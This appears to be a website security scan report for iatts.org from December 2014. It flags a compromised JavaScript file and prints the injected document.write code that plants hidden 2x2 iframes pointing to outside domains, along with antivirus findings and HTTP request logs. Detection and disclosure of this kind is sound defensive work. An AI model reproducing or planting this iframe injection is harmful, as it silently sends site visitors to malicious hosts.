Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iatts.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iatts.org/ | 200 OK Content-Length: 20193 Content-Type: text/html | clean |
http://iatts.org/Scripts/swfobject_modified.js | 200 OK Content-Length: 22201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vippraiahotel.com.br/omaf.html?j=1247457></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=1247457></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosepho
var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }();
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1247457
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1247457>
Hidden iFrame found. size: 2x2 src: http://vippraiahotel.com.br/omaf.html?j=1247457
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vippraiahotel.com.br/omaf.html?j=1247457>
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/womd.html?j=1247457
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/womd.html?j=1247457>
http://iatts.org/IATTS-About.html | 200 OK Content-Length: 14433 Content-Type: text/html | clean |
http://iatts.org/IATTS-Membership.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/test404page.js | 404 Not Found Content-Length: 515 Content-Type: text/html | clean |
http://iatts.org/IATTS-benefits.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/IATTS-contactus.html | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://iatts.org/index.html | 200 OK Content-Length: 20193 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iatts.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 03:37:16 GMT
Accept-Ranges: bytes
ETag: "13f611-4ee1-4fa66dcde6097"
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 20193
Content-Type: text/html
Last-Modified: Tue, 27 May 2014 19:40:06 GMT
...20193 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: iatts.org
Referer: http://www.google.com/search?q=iatts.org
Result:
The result is similar to the first query. There are no suspicious redirects found.